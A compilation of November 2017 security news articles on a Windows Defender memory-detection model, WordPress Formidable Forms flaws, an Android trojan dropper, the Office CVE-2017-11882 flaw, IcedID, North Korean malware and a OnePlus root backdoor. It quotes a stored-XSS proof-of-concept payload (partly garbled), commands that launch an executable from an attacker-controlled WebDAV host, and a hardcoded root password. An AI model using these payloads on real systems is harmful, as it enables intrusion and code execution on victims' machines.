The detection model used in Windows 10 first learns about the normal allocations of a process, then it determines that a process associated with malicious activity allocates executable memory that deviates from the normal behavior. The model is meant to prove that memory events can be used as the primary signal for detecting reflective DLL loading, Seifert says.

The real model, however, also includes various other features, such as allocation size, allocation history, thread information, allocation flags, and the like. It also takes into consideration variations in application behavior, so its effectiveness is increased through additional behavioral signals, such as network connection behavior.

In an attack scenario where the victim opens a malicious Word document from a file share and enables macro code to run, the Word process connects to the attacker-specified command and control (C&C) server to fetch the DLL to be reflectively loaded. Once the loading has been completed, it connects to the C&C and provides command line access to the victim machine.

Windows Defender ATP, Microsoft says, identifies the memory allocations as abnormal and alerts on the matter, providing context on the document and information on the C&C communication. Similarly, Microsoft Office 365 Advanced Threat Protection prevents such attacks through dynamic behavior matching.

Seifert also points out that Windows Defender ATP is a post-breach solution designed to alert on detected hostile activity. It can also provide detailed event timelines and other contextual information for attack analysis, the researcher says.

Formidable Forms plugin vulnerabilities expose WordPress sites attacks
16.11.2017 securityaffairs

A researcher from Finland-based company Klikki Oy has discovered several vulnerabilities in the Formidable Forms plugin that expose websites to attacks.
The researcher Jouko Pynnönen from Finland-based company Klikki Oy has discovered several vulnerabilities in the Formidable Forms plugin the expose websites to attacks.

The Formidable Forms plugin allows users to easily create contact pages, polls and surveys, and many other kinds of forms, it has more than 200,000 active installs.

Pynnönen discovered that the dangerous flaws affect both the free and as a paid version.

The most severe issue discovered by the expert is a blind SQL injection that can be exploited by attackers to enumerate a website’s databases and access their content, including user credentials and data submitted to a website via Formidable forms.

Unfortunately, this isn’t the unique flaw of this type, the researcher also found another flaw that exposes data submitted via forms created with the Formidable Forms plugin. Both vulnerabilities are related to the way the plugin implements shortcodes.

“The plugin implemented a form preview AJAX function accessible to anyone without authentication. The function accepted some parameters affecting the way it generates the form preview HTML. Parameters after_html and before_html could be used to add custom HTML after and before the form. Most of the vulnerabilities relied on this feature.” wrote Pynnonen.

Formidable Forms plugin vulnerabilities expose WordPress sites attacks

The Formidable Forms plugin is also affected by reflected and stored cross-site scripting (XSS) vulnerabilities. The stored XSS could be exploited by an attacker to execute arbitrary JavaScript code in the context of an administrator’s browsing session. An attacker can inject a malicious code via forms, the code is executed when the site admin view it on the dashboard.

“Administrators can view data entered by users in Formidable forms in the WordPress Dashboard. Any HTML entered in forms is filtered with the wp_kses() function. This isn’t enough to prevent dangerous HTML as it allows the “id” and “class” HTML attributes and e.g. the <form> HTML tag. It was possible to craft HTML code which would result in attacker-supplied JavaScript to be executed when the form entry is viewed.” added the expert.

Below the example shared by the expert:

<form id=tinymce><textarea name=DOM> </textarea></form>
<a class=frm_field_list>panelInit</a>
<aid ="frm_dyncontent"> <bid ="xxxdyn_default_valuexxxxx" class="ui-find-overlay wp-editor-wrap">overlay</b></a>
<aid =post-visibility-display>vis1</a><aid =hidden-post-visibility>vis2</a><aid =visibility-radio-private>vis3</a>
<div id=frm-fid-search-menu><aid =frm_dynamic_values_tab>zzz</a></div>
<form id=posts-filter method=post action=admin-ajax.php?action=frm_forms_preview>
<textarea name=before_html>&lt;svg on[entry_key]loaad=ler(t/xss/) <//te&xtagt;rea></form>
The expert also discovered that if the WordPress installation includes the iThemes Sync WordPress maintenance plugin alongside Formidable Forms, the attacker can exploit the SQL injection flaw to obtain a user’s ID and authentication key.

The user’s ID and the authentication key can be used to control WordPress via iThemes Sync.

Formidable Forms promptly fixed the flaws with the release of versions 2.05.02 and 2.

The expert identified the issued as part of a bug bounty program that offers rewards of up to $10,000, the initiative managed by the HackerOne was run by an unnamed Singapore-based tech company. The Formidable Forms plugin is one of the software used by the tech company.

The researcher received $4,500 reward for the SQL injection vulnerability and a few hundred dollars for each of the other security holes.

Multi-Stage Android/TrojanDropper.Agent.BKY Malware bypasses Google Play detection once again
16.11.2017 securityaffairs Android

Researchers from security firm ESET, discovered a multi-stage Malware dubbed Android/TrojanDropper.Agent.BKY that evaded Google Play detection.
Security experts at ESET have discovered a multi-stage Android malware, tracked as Android/TrojanDropper.Agent.BKY, that was available for download in the official Google Play store.

The researchers have found eight malicious applications in the official application store (MEX Tools, Clear Android, Cleaner for Android, World News, WORLD NEWS, World News PRO, Игровые Автоматы Слоты Онлайн, and Слоты Онлайн Клуб Игровые Автоматы), they appear as legitimate applications and use advanced anti-detection features.

“Detected by ESET security systems as Android/TrojanDropper.Agent.BKY, these apps form a new family of multi-stage Android malware, legitimate-looking and with delayed onset of malicious activity.” states the analysis published by ESET.

The experts highlighted the use of advanced anti-detection features implemented by these apps that were downloaded only by several hundred users.

The Android/TrojanDropper.Agent.BKY samples analyzed by ESET employ a multi-stage architecture along with encryption.

Once downloaded and installed, the malicious apps do not request any suspicious permissions and even mimic the activity they were supposed to.

In background, the apps decrypt and execute a first-stage payload designed to decrypt and execute the second-stage payload from the assets of the app downloaded from Google Play.Android
Android TrojanDropper Agent.BKY

TrojanDropper Agent.BKY

The malware implements obfuscatory measures to remain under the radar.

The second-stage payload downloads a malicious application from a hardcoded URL it waits around 5 minutes before asking users to install the third-stage payload that masquerades as Adobe Flash Player or another popular app.

“The app downloaded by the second-stage payload is disguised as well-known software like Adobe Flash Player or as something legitimate-sounding yet completely fictional – for example “Android Update” or “Adobe Update”. In any case, this app’s purpose is to drop the final payload and obtain all the permissions that payload needs for its malicious actions.” continues the analysis.

Once the third-stage payload is installed it decrypts and executes the final fourth-stage payload that was a mobile banking Trojan.

The Trojan displays a fake login forms to steal their credentials or credit card details.

Experts noticed that one of the malicious apps downloads the trojan using the bit.ly URL shortener, this allowed them to discover that the link had been used almost 3000 times as of November 14, that most of the connections were from infected hosts in the Netherlands.

Two of most recent samples of the TrojanDropper malware were observed dropping either the MazarBot banking Trojan or spyware.

ESET suggests the impacted users to first deactivate the admin rights for the installed payload, and then uninstall the installed payload uninstall the app initially downloaded from the Play Store.

Further technical details, including the IoCs are included in the report published by ESET.

“Unfortunately, multi-stage downloaders, with their improved obfuscation features, have a better chance of sneaking into official app stores than common Android malware does.” concluded ESET. “Users who want to stay protected should not rely fully on the stores’ protections; instead, it’s crucial for users to check app ratings and comments, pay attention to what permissions they grant to apps, and run a quality security solution on their mobile devices,”

Forever 21 Warns Shoppers of Payment Card Breach at Some Stores
15.11.2017 thehackernews Crime

Another day, another data breach. This time a fast-fashion retailer has fallen victim to payment card breach.
American clothes retailer Forever 21 announced on Tuesday that the company had suffered a security breach that allowed unknown hackers to gain unauthorized access to data from payment cards used at a number of its retail locations.
The Los Angeles based company, which operates over 815 stores in 57 countries, didn't say which of its stores were affected, but it did note that customers who shopped between March and October this year may be affected.
Forever 21 learned of the breach after the retailer received a report from a third-party monitoring service, suggesting there may have been "unauthorized access to data from payment cards that were used at certain FOREVER 21 stores."
Besides this, the company also revealed that it implemented encryption and token-based authentication systems in 2015 that are intended to protect transaction data on its point-of-sale (PoS) machines in its stores.
However, due to dysfunctional of the security layers on certain PoS devices, hackers were able to gain unauthorized access to data from payment cards at some Forever 21 stores, the company admitted.
Since the investigation of its payment card systems is still ongoing, complete findings of the incident, including the number of customers potentially affected, are not available at the moment.
"Forever 21 immediately began an investigation of its payment card systems and engaged a leading security and forensics firm to assist," the US clothing retailer said while announcing the data breach.
"We regret that this incident occurred and apologize for any inconvenience. We will continue to work to address this matter."
Meanwhile, customers who shopped at Forever 21 are advised to monitor their payment card statements carefully, and immediately notify their banks that issued the card for any unauthorized charge.
This incident is yet another embarrassing breach disclosed recently, followed by Disqus' disclosure of a 5-year-old breach where hackers stole details of over 17.5 million users and Yahoo's disclosure that 2013 data breach affected all of its 3 Billion users.
The recent incidents also include Equifax's disclosure of a breach of potentially 145.5 million customers, U.S. Securities and Exchange Commission (SEC) disclosure of a breach that profited hackers, and Deloitte's revelation of a cyber attack that resulted in the theft of its clients' private emails and documents.

Firefox 57 "Quantum" Released – 2x Faster Web Browser
15.11.2017 thehackernews IT

It is time to give Firefox another chance.
The Mozilla Foundation today announced the release of its much awaited Firefox 57, aka Quantum web browser for Windows, Mac, and Linux, which claims to defeat Google's Chrome.
It is fast. Really fast. Firefox 57 is based on an entirely revamped design and overhauled core that includes a brand new next-generation CSS engine written in Mozilla’s Rust programming language, called Stylo.
Firefox 57 "Quantum" is the first web browser to utilize the power of multicore processors and offers 2x times faster browsing experience while consuming 30 percent less memory than Google Chrome.
Besides fast performance, Firefox Quantum, which Mozilla calls "by far the biggest update since Firefox 1.0 in 2004," also brings massive performance improvements with tab prioritization, and significant visual changes with a completely redesigned user interface (UI), called Photon.

This new version also adds in support for AMD VP9 hardware video decoding during playback in an attempt to reduce power consumption, and thus preventing your systems from running out of battery.
Firefox 57 also includes built-in screenshot functionality, improved tracker blocking and support for WebVR to enable websites to take full advantage of VR headsets.
Firefox has plans to speed things even further by leveraging modern GPUs in the near future.
Firefox Quantum for the desktop version is available for download now on Firefox's official website, and all existing Firefox users should be able to upgrade to the new version automatically.
However, the Android version of Firefox 57 is rolling out on Google Play in coming days, and its iOS version should eventually arrive on Apple's official App Store.

Patch Tuesday: Microsoft Releases Update to Fix 53 Vulnerabilities
15.11.2017 thehackernews

It's Patch Tuesday—time to update your Windows devices.
Microsoft has released a large batch of security updates as part of its November Patch Tuesday in order to fix a total of 53 new security vulnerabilities in various Windows products, 19 of which rated as critical, 31 important and 3 moderate.
The vulnerabilities impact the Windows OS, Microsoft Office, Microsoft Edge, Internet Explorer, Microsoft Scripting Engine, .NET Core, and more.
At least four of these vulnerabilities that the tech giant has now fixed have public exploits, allowing attackers to exploit them easily. But fortunately, none of the four are being used in the wild, according to Gill Langston at security firm Qualys.
The four vulnerabilities with public exploits identified by Microsoft as CVE-2017-8700 (an information disclosure flaw in ASP.NET Core), CVE-2017-11827 (Microsoft browsers remote code execution), CVE-2017-11848 (Internet Explorer information disclosure) and CVE-2017-11883 (denial of service affecting ASP.NET Core).
Potentially Exploitable Security Vulnerabilities
What's interesting about this month's patch Tuesday is that none of the Windows OS patches are rated as Critical. However, Device Guard Security Feature Bypass Vulnerability (CVE-2017-11830) and Privilege Elevation flaw (CVE-2017-11847) are something you should focus on.
Also, according to an analysis of Patch Tuesday fixes by Zero-Day Initiative, CVE-2017-11830 and another flaw identified as CVE-2017-11877 can be exploited to spread malware.
"CVE-2017-11830 patches a Device Guard security feature bypass vulnerability that would allow malware authors to falsely authenticated files," Zero-Day Initiative said.
"CVE-2017-11877 fixes an Excel security feature bypass vulnerability that fails to enforce macro settings, which are often used by malware developers."
The tech giant also fixed six remote code execution vulnerabilities exist "in the way the scripting engine handles objects in memory in Microsoft browsers."
Microsoft identified these vulnerabilities as CVE-2017-11836, CVE-2017-11837, CVE-2017-11838, CVE-2017-11839, CVE-2017-11871, and CVE-2017-11873, which could corrupt memory in such a way that attackers could execute malicious code in the context of the current user.
"In a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Microsoft Edge and then convince a user to view the website," Microsoft said. "These websites could contain specially crafted content that could exploit the vulnerability."
17-Year-Old MS Office Flaw Lets Hackers Install Malware
Also, you should be extra careful when opening files in MS Office.
All versions of Microsoft Office released in the past 17 years found vulnerable to remote code execution flaw (CVE-2017-11882) that works against all versions of Windows operating system, including the latest Microsoft Windows 10 Creators Update.
However, due to improper memory operations, the component fails to properly handle objects in the memory, corrupting it in such a way that the attacker could execute malicious code in the context of the logged-in user.
Exploitation of this vulnerability requires opening a specially crafted malicious file with an affected version of Microsoft Office or Microsoft WordPad software, which could allow attackers to remotely install malware on targeted computers.
Adobe Patch Tuesday: Patches 62 Vulnerabilities
Besides fixing vulnerabilities in its various products, Microsoft has also released updates for Adobe Flash Player.
These updates correspond with Adobe Update APSB17-33, which patches 62 CVEs for Acrobat and Reader alone. So, Flash Player users are advised to ensure that they update Adobe across their environment to stay protected.
It should also be noted that last Patch Tuesday, Microsoft quietly released the patch for the dangerous KRACK vulnerability (CVE-2017-13080) in the WPA2 wireless protocol.
Therefore, users are also recommended to make sure that they have patched their systems with the last month's security patches.
Alternatively, users are strongly advised to apply November security patches as soon as possible in order to keep hackers and cybercriminals away from taking control of their computers.
For installing security updates, just head on to Settings → Update & security → Windows Update → Check for updates, or you can install the updates manually.

17-Year-Old MS Office Flaw Lets Hackers Install Malware Without User Interaction
15.11.2017 thehackernews

You should be extra careful when opening files in MS Office.
When the world is still dealing with the threat of 'unpatched' Microsoft Office's built-in DDE feature, researchers have uncovered a serious issue with another Office component that could allow attackers to remotely install malware on targeted computers.
The vulnerability is a memory-corruption issue that resides in all versions of Microsoft Office released in the past 17 years, including Microsoft Office 365, and works against all versions of Windows operating system, including the latest Microsoft Windows 10 Creators Update.
Discovered by the security researchers at Embedi, the vulnerability leads to remote code execution, allowing an unauthenticated, remote attacker to execute malicious code on a targeted system without requiring user interaction after opening a malicious document.
The vulnerability, identified as CVE-2017-11882, resides in EQNEDT32.EXE, an MS Office component which is responsible for insertion and editing of equations (OLE objects) in documents.
However, due to improper memory operations, the component fails to properly handle objects in the memory, corrupting it in such a way that the attacker could execute malicious code in the context of the logged-in user.
Seventeen years ago, EQNEDT32.EXE was introduced in Microsoft Office 2000 and had been kept in all versions released after Microsoft Office 2007 in order to ensure the software remains compatible with documents of older versions.
DEMO: Exploitation Allows Full System Take Over


Exploitation of this vulnerability requires opening a specially crafted malicious file with an affected version of Microsoft Office or Microsoft WordPad software.
This vulnerability could be exploited to take complete control over a system when combined with Windows Kernel privilege escalation exploits (like CVE-2017-11847).
Possible Attack Scenario:
While explaining the scope of the vulnerability, Embedi researchers suggested several attack scenarios listed below:
"By inserting several OLEs that exploited the described vulnerability, it was possible to execute an arbitrary sequence of commands (e.g., to download an arbitrary file from the Internet and execute it)."
"One of the easiest ways to execute arbitrary code is to launch an executable file from the WebDAV server controlled by an attacker."
"Nonetheless, an attacker can use the described vulnerability to execute the commands like cmd.exe /c start \\attacker_ip\ff. Such a command can be used as a part of an exploit and triggers starting WebClient."
"After that, an attacker can start an executable file from the WebDAV server by using the \\attacker_ip\ff\1.exe command. The starting mechanism of an executable file is similar to that of the \\live.sysinternals.com\tools service."
Protection Against Microsoft Office Vulnerability
With this month's Patch release, Microsoft has addressed this vulnerability by changing how the affected software handles objects in memory.
So, users are strongly recommended to apply November security patches as soon as possible to keep hackers and cybercriminals away from taking control of their computers.
Since this component has a number of security issues which can be easily exploited, disabling it could be the best way to ensure your system security.
Users can run the following command in the command prompt to disable registering of the component in Windows registry:
reg add "HKLM\SOFTWARE\Microsoft\Office\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400
For 32-bit Microsoft Office package in x64 OS, run the following command:
reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Office\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400
Besides this, users should also enable Protected View (Microsoft Office sandbox) to prevent active content execution (OLE/ActiveX/Macro).

Forever 21 Investigating Payment Card Breach
15.11.2017 securityweek  Cyber
Los Angeles-based fashion retailer Forever 21 informed customers on Tuesday that it has launched an investigation into a security incident involving payment systems.

The company said it recently learned from a third-party that credit and debit cards used at certain Forever 21 stores may have been compromised.

An investigation has been launched and a cybersecurity and forensics firm has been called in to assist. Forever 21 has provided few details about the incident, but noted that its investigation focuses on transactions made between March and October 2017.

The company has promised to share more information, including the list of affected stores and timeframes, in the upcoming period. It did, however, highlight that security mechanisms implemented in many of its stores made stealing payment card information difficult.

“Because of the encryption and tokenization solutions that Forever 21 implemented in 2015, it appears that only certain point of sale devices in some Forever 21 stores were affected when the encryption on those devices was not in operation,” the company said in a statement.

In the meantime, the company has advised customers to keep a close eye on credit card statements and immediately notify their bank of any unauthorized charges.

Forever 21 operates over 800 stores in 57 countries around the world. The company is the 5th largest specialty retailer in the United States.

“With its endless POS endpoints, the retail industry has always been a desirable target for cybercriminals,” said Mark Cline, a VP at managed security services firm Netsurion. “They know that if they can introduce malware into POS networks, they can make a decent amount of cash by selling credit card numbers on the dark web. With their millions of customers, large retailers, like Forever 21, have typically been the hardest hit. Companies must pay up to $172 per stolen record in clean-up costs.”

“If retail businesses haven’t hardened their IT and POS security, they should start now to protect themselves from POS malware, ransomware and other threats—especially as we move into the holiday shopping season,” Cline added. “They may be running anti-virus software and managed firewalls, but they may or may not be running a strong offense with active monitoring and threat detection.”

Forever 21 is not the only clothing retailer to report a payment card breach this year. Brooks Brothers and Buckle also reported finding malware on their payment systems. Eddie Bauer informed customers of a cyber intrusion last year.

Flaw in Siemens RTU Allows Remote Code Execution
15.11.2017 securityweek 
Potentially serious vulnerabilities have been found in some Siemens SICAM remote terminal unit (RTU) modules, but patches will not be released as the product has been discontinued.

Researchers at IT security services and consulting company SEC Consult discovered the flaws in the SICAM RTU SM-2556 COM modules, which can be attached to SICAM 1703 and RTU substation controllers for LAN/WAN communications. The product is used worldwide in the energy and other sectors.

The most serious of the security holes is CVE-2017-12739, a critical vulnerability in the integrated web server that allows an unauthenticated attacker with network access to remotely execute code on affected devices.

The web server is also impacted by a reflected cross-site scripting (XSS) vulnerability that can be exploited by getting the targeted user to click on a link (CVE-2017-12738), and a flaw that can be exploited by a remote attacker to bypass authentication and obtain sensitive device information, including passwords (CVE-2017-12737).

The vulnerabilities affect devices running firmware versions ENOS00, ERAC00, ETA2, ETLS00, MODi00 and DNPi00. Since the product has been discontinued, Siemens has decided not to release patches. However, users can prevent potential attacks by disabling the affected web server, which is designed for diagnostics and is not needed for normal operation.

Siemens pointed out, however, that the vulnerable versions of the firmware may also be running on the SM-2558 COM module, the successor of SM-2556. The automation giant has advised customers to update to the newer ETA4, MBSiA0 and DNPiA1 firmware versions.

In its own advisory, SEC Consult said it reported the vulnerabilities to Siemens in late September. According to the company, the GoAhead webserver used by the RTU module was released in October 2003 and it’s affected by several known vulnerabilities.

SEC Consult has published proof-of-concept (PoC) code for the authentication bypass and XSS vulnerabilities.

Researchers haven’t found many vulnerabilities in Siemens SICAM products. ICS-CERT has only published a handful of advisories in the past years, but they mostly describe high severity and critical flaws.

New IcedID Banking Trojan Emerges
15.11.2017 securityweek 
A newly discovered banking Trojan called IcedID was built with a modular design and modern capabilities when compared to older financial threats, IBM X-Force warns.

The new threat was first observed in September 2017 as part of test campaigns, and is now actively targeting banks, payment card providers, mobile services providers, payroll accounts, webmail accounts and e-commerce sites in the United States, along with two major banks in the United Kingdom.

Although it does include features comparable with those of other banking Trojans out there and can perform advanced browser manipulation tactics, IcedID does not seem to borrow code from other Trojans, IBM says. However, because the threat includes capabilities already on par with those of Trojans such as Zeus, Gozi and Dridex, the researchers believe IcedID will receive further updates soon.

As part of the initial infection campaigns, the new banking Trojan has been dropped through the Emotet Trojan, which led X-Force research to believe that its operators aren’t new to the threat arena.

Emotet has been the distribution vehicle for many malware families this year, mainly focused on the U.S., but also targeting the U.K. and other parts of the world. In 2017, Emotet has been serving “elite cybercrime groups from Eastern Europe, such as those operating QakBot and Dridex,”and has now added IcedID to its payload list, IBM says.

First spotted in 2014 as a banking Trojan, Emotet is distributed via malicious spam emails, usually inside documents that feature malicious macros. Once on a machine, Emotet achieves persistence and ensnares the system into a botnet. It also fetches a spamming module, a network worm module, and password and data stealers.

IcedID itself includes network propagation capabilities, which suggests its authors might be targeting businesses with the new threat. IBM observed the malware infecting terminal servers, which usually provide endpoints, printers, and shared network devices with a common connection point to a local area network (LAN) or a wide area network (WAN).

The Trojan queries the lightweight directory access protocol (LDAP) to discover other users to infect, the researchers say. They also note that, on the compromised systems, the malware sets up a local proxy for traffic tunneling to monitor the victim’s online activity and leverages both web injections and redirections to perform its nefarious operations.

IcedID downloads the configuration file (containing a list of targets) from its command and control (C&C) server when the user opens a web browser. It was also observed using secure sockets layer (SSL) for communication with the server.

The malware doesn’t appear to feature advanced anti-virtual machine (VM) or anti-research techniques, although it does require a reboot to complete the deployment, most likely to evade sandboxes that do not emulate rebooting.

For persistence, the malware creates a RunKey in the registry, after which it writes an RSA crypto key to the system into the AppData folder. The researchers have yet to determine the exact purpose of this key.

The redirection technique employed by IcedID is designed to appear as seamless as possible to the victim. Thus, the legitimate bank’s URL is displayed in the address bar, along with the bank’s correct SSL certificate, which means that the connection with the actual bank’s site is kept alive. The victim, however, is tricked into revealing their credentials on a fake web page. Through social engineering, the victim is also fooled into revealing transaction authorization elements.

During a single campaign in late October, the Trojan was observed communicating with four different C&C servers.

The malware’s operators also use a dedicated, web-based remote panel to orchestrate webinjection attacks for the targeted bank sites. The panel is accessible with a username and password combination. The server the panel communicates with is based on the OpenResty web platform.

“Webinjection panels are typically commercial offerings criminals buy in underground markets. It is possible that IcedID’s uses a commercial panel or that IcedID itself is commercial malware. However, at this time there is no indication that IcedID is being sold in the underground or Dark Web marketplaces,” IBM notes.

Adobe Patches 80 Flaws Across Nine Products
15.11.2017 securityweek 
Adobe on Tuesday announced the availability of patches for a total of 80 vulnerabilities across the company’s Flash Player, Photoshop, Connect, Acrobat and Reader, DNG Converter, InDesign, Digital Editions, Shockwave Player, and Experience Manager products.

The highest number of vulnerabilities, 56, has been addressed in Acrobat and Reader for Windows and Mac. The list includes many critical uninitialized pointer access, use-after-free, buffer access, buffer over-read, buffer overflow, out-of-bounds read/write, improper array index validation, security bypass, type confusion, and untrusted pointer dereference issues that can be exploited for remote code execution.

A total of 16 companies and individuals have been credited for reporting the Acrobat and Reader security holes. Well over half of the flaws were discovered by employees of China-based Tencent.

Updates for the Windows, Mac, Linux and Chrome OS versions of Flash Player patch five critical out-of-bounds read and use-after-free vulnerabilities that can be exploited for remote code execution.

Critical code execution weaknesses have also been resolved in the Windows and Mac versions of Photoshop CC, and Shockwave Player for Windows.

In Adobe Connect, the company fixed four server-side request forgery (SSRF) and cross-site scripting (XSS) issues, and added a feature designed to help administrators protect users against clickjacking attacks.

In Digital Editions for Windows, Mac, iOS, and Android, Adobe addressed six bugs that can lead to disclosure of memory addresses and other information.

Adobe also advised users to update Experience Manager in order to address moderate and important severity XSS and information disclosure vulnerabilities. One critical memory corruption flaw was patched in DNG Converter for Windows, and one similar issue was resolved in InDesign for Windows and Mac.

Adobe says there is no evidence that any of these flaws have been exploited in the wild. On last month’s Patch Tuesday, Adobe announced that there had not been any security updates. However, the company was forced to release an out-of-band update just a few days later after learning of a Flash Player zero-day that had been exploited by a Middle Eastern threat actor to deliver spyware.

Microsoft has also released its Patch Tuesday updates. The company addressed more than 50 vulnerabilities, including 20 critical browser flaws.

Microsoft Patches 20 Critical Browser Vulnerabilities
15.11.2017 securityweek 
Microsoft’s Patch Tuesday updates for November address more than 50 vulnerabilities, including 20 critical flaws affecting the company’s web browsers.

A total of 53 CVE identifiers have been assigned to the security bugs addressed by Microsoft this month. None of them appear to have been exploited in attacks before the company released the patches.

Three of the flaws have already been publicly disclosed. These are a browser memory corruption that can lead to code execution (CVE-2017-11827), an information disclosure issue in ASP.NET (CVE-2017-8700), and an information disclosure bug in Internet Explorer (CVE-2017-11848).

A total of 20 critical vulnerabilities have been addressed this month and they all affect Internet Explorer and/or Edge. The security holes exist due to the way the browsers, particularly the scripting engines they use, handle objects in memory.

The vulnerabilities can be exploited for arbitrary code execution by getting the targeted user to access a specially crafted website via the vulnerable web browser.

These critical flaws were reported to Microsoft by independent researchers and employees of Palo Alto Networks, Qihoo 360, Google, and the UK’s National Cyber Security Centre (NCSC). Many of the security holes were found by the Google Project Zero researcher known as Lokihardt and their details will likely be made public by Google in the upcoming period.

Other vulnerabilities patched this month by Microsoft include important severity denial-of-service (DoS) and privilege escalation bugs in ASP.NET, a Device Guard security feature bypass, information disclosure and security feature bypass issues in Edge, Office memory corruptions, and information disclosure, privilege escalation and DoS flaws in Windows.

Microsoft has also updated Adobe Flash Player components. Adobe has addressed a total of 80 vulnerabilities across nine products, including five critical out-of-bounds read and use-after-free vulnerabilities in Flash Player that can be exploited for remote code execution.

Last month, both Microsoft and Adobe patched zero-day vulnerabilities exploited by threat actors to deliver malware.

SAP Patches Critical Issues With November 2017 Security Updates
15.11.2017 securityweek 
SAP today released its November 2017 set of patches to address 22 vulnerabilities across its product portfolio, including three issues rated Very High priority (Hot News).

The enterprise software maker included 13 patches in this month’s SAP Security Patch Day, to which 9 patches that are updates to previously released security notes are added.

Three of the security notes address vulnerabilities considered Hot News, one patches a High severity issue, while the remaining 18 security notes address Moderate risk bugs. The highest CVSS score of the patches is 9.1.

This is the first SAP Security Patch Day to include Hot News security notes after one of the April 2017 security patches addressed a Very High priority vulnerability in TREX / BWA that could allow an attacker to execute commands on the affected system.

All three Hot News security notes were updates to previously released notes. One of them was patched in September 2016 and is a code injection vulnerability in Text Conversion. Onapsis, a company that specializes in security SAP and Oracle applications and which reported the vulnerability, explains that SAP updated the security note with some additional correction instructions.

The other two flaws were both resolved in September 2017 and represent an information disclosure in SAP Landscape Management (LaMa) 3.0 and an information disclosure in LVM 2.1 and LaMa 3.0. Both bugs result in an attacker being able to access relevant data under certain conditions, Onapsis says.

According to ERPScan, another company that specializes in the security of SAP and Oracle software, 10 Support Package Notes should be added to the aforementioned 22 security notes, for a total of 32 patches (3 Hot News, 2 High, 26 Medium, and 1 Low).

13 of all the patches are updates to previously released notes and 15 of the notes were released after last month’s Security Patch Day but before today, ERPScan says.

SAP resolved 6 implementation flaws this month, 5 XSS bugs, 5 Information disclosure issues, 5 missing authorization checks, 3 XML external entity flaws, 2 directory traversal bugs, a local command execution, an OS command execution, a XSFR, a clickjacking bug, a privilege escalation flaw, and a log injection issue.

Some of the most dangerous vulnerabilities addressed this month include an implementation flaw (CVSS Base Score: 8) in SAP Management Console, a Cross-Site Scripting (XSS) vulnerability (CVSS Base Score: 6.1) in SAP SAPUI5, and a Cross-Site Scripting (XSS) vulnerability (CVSS Base Score: 6.1) in SAP BusinessObjects Analysis Edition for OLAP.

SAP also resolved a couple of issues impacting SAP Hana, namely an information disclosure vulnerability in SAP HANA Extended Application Services (XS Advanced) and an information disclosure in SAP NetWeaver Instance Agent Service.

U.S. Government Shares Details of FALLCHILL Malware Used by North Korea
15.11.2017 securityweek  BigBrothers
FALLCHILL Malware Used by North Korean Government Hackers is a Fully Functional RAT, DHS Says

The United States Department of Homeland Security (DHS) shared details of a hacking tool they say is being used by a threat group linked to the North Korean government known as “Hidden Cobra.”

The threat actor dubbed by the U.S. government “Hidden Cobra” is better known in the cybersecurity community as Lazarus Group, which is believed to be behind several high-profile attacks, including the ones targeting Sony Pictures, Bangladesh’s central bank, and financial organizations in Poland. Links have also been found between the threat actor and the recent WannaCry ransomware attacks, but some experts are skeptical.


A joint alert issued by the DHS and FBI said a remote administration tool (RAT) known as FALLCHILL was used by the North Korean government to hack into companies in the aerospace, telecommunications, and finance sectors. The alert describes FALLCHILL as a “fully functional RAT with multiple commands that the actors can issue from a command and control (C2) server to a victim’s system via dual proxies.”

The U.S. Government has been able identify 83 network nodes in the infrastructure used by the FALLCHILL malware. The alert says that, according to a trusted third party, FALLCHILL uses fake SSL headers for communications. "After collecting basic system information, the backdoor will begin communication with the C&C server using a custom encrypted protocol with the header that resembles TLS/SSL packets," it reads."

In a separate alert issued Tuesday, the DHS and FBI shared a list of Internet Protocol (IP) addresses and other indicators of compromise (IOCs) associated with a variant of the Volgmer Trojan used by the North Korean government. The alert describes Volgmer as a backdoor Trojan “designed to provide covert access to a compromised system.” The DHS says at least 94 static IP addresses were identified to be connected to Volgmer's infrastrucutre, along with dynamic IP addresses registered across various countries.

According to DHS, the North Korea-linked hackers have been using Volgmer malware in attacks against the government, financial, automotive, and media industries since at least 2013.

“DHS and FBI are distributing these IP addresses to enable network defense and reduce exposure to North Korean government malicious cyber activity,” the alert states.

The DHS warned that spear phishing appears to be the primary delivery mechanism for Volgmer infections; but added that the Hidden Cobra threat actors also use a suite of custom tools, some of which could also be used to initially compromise a system.

The alert with technical details and IOCs on FALLCHILL are available here. The alert and technical details for the the Volgmer Trojan are available here.

In June, US-CERT released a technical alert to warn organizations of distributed denial-of-service (DDoS) attacks conducted by Hidden Cobra.

A Backdoor in OnePlus devices allows root access without unlocking bootloader
15.11.2017 securityaffairs Mobil

Expert discovered a backdoor in OnePlus devices that allows root access without unlocking the bootloader.
Other problems for the owners of the OnePlus smartphone, this time experts discovered a backdoor that allows root access without unlocking the bootloader.

Just over a month after OnePlus was caught collecting personally identifiable information on its users, the Chinese smartphone company has been found leaving a backdoor on almost all OnePlus handsets.

The Twitter user, who goes by the handle of “Elliot Anderson @fs0c131y,” (the name of the Mr. Robot’s main character), discovered a backdoor in OnePlus devices running OxygenOS that could allow anyone to obtain root access to the handsets.

13 Nov
Elliot Alderson @fs0c131y
Replying to @fs0c131y and 8 others
In the onCreate method if the intent is not null the escalatedUp method is called with the parameter enable=true and password=getIntent().getStringExtra("code"). Do you see where I'm going? pic.twitter.com/oa1i1NdlpU

Elliot Alderson @fs0c131y
The escalatedUp method is calling Privilege.escalate(password) and if the result is true, it set the system property persist.sys.adbroot and oem.selinux.reload_policy to 1 pic.twitter.com/92LeBfDPAv

6:39 PM - Nov 13, 2017
View image on Twitter
4 4 Replies 11 11 Retweets 35 35 likes
View image on Twitter
Most of the OnePlus devices, including OnePlus 2, 3, 3T and brand-new OnePlus 5, comes with a pre-installed diagnostic testing application dubbed EngineerMode.”

root oneplus devices android hacking

The app was developed by Qualcomm to help device manufacturers to easily test all hardware components of the devices.

The app is visible in the list of applications installed on the OnePlus devices.

The pre-installed app is exploitable by attackers with a physical access to the device and allows to gain root access on the smartphone.

The @fs0c131y user decompiled the EngineerMod APK and shared it on GitHub, he discovered the ‘DiagEnabled’ activity that could be opened with hardcoded password “Angela” to gain full root access on the smartphone, without even unlocking the bootloader.

13 Nov
Elliot Alderson @fs0c131y
Replying to @fs0c131y and 8 others
I will find time to make a POC.
But it's not the biggest issue with this app.

Elliot Alderson @fs0c131y
